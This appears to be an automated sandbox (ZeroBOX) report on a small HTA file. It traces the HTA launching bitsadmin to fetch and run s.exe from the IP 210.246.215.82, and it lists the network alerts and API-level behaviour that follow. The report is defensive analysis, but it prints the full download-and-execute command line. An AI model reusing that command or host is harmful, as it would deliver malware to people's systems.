Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 3, 2024, 1:39 p.m.	April 3, 2024, 1:45 p.m.

Size	834.0B
Type	HTML document, ASCII text, with CRLF line terminators
MD5	`e81963d4c5a431f529c7669d3595a943`
SHA256	`cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b`
CRC32	`5092EC86`
ssdeep	`24:hMNmMvy4GqptE0ia57Irp8xuY8y+/r88+M8E4olEC:ImMqopO0Jx4d4+/Xt40F`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\dll.hta
1668
- bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe
  2080
- s.exe "C:\ProgramData\s.exe"
  2616

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
162.19.139.184	Active	Moloch
210.246.215.82	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49163 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49163 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49163 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49163 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 210.246.215.82:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 210.246.215.82:80 -> 192.168.56.103:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 210.246.215.82:80 -> 192.168.56.103:49165	2015745	ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 210.246.215.82:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2024, 1:32 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 1:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2024, 1:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2024, 1:33 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2024, 1:32 p.m.			0	0
IsDebuggerPresent April 3, 2024, 1:32 p.m.			0	0
IsDebuggerPresent April 3, 2024, 1:33 p.m.			0	0
IsDebuggerPresent April 3, 2024, 1:33 p.m.			0	0

Command line console output was observed (50 out of 165 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2024, 1:39 p.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2024, 1:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ad537a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 1:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ad53810 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 3, 2024, 1:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ad53810 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 3, 2024, 1:39 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	HEAD http://210.246.215.82/s.exe
suspicious_features	Connection to IP address				suspicious_request	GET http://210.246.215.82/s.exe

Performs some HTTP requests (2 events)

request	HEAD http://210.246.215.82/s.exe
request	GET http://210.246.215.82/s.exe

Allocates read-write-execute memory (usually to unpack itself) (49 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000610000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2481000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b1b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 2490368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2482000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2484000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2484000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2484000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2484000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92dc6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92ceb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:32 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 3, 2024, 1:33 p.m.	process_identifier: 2616 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
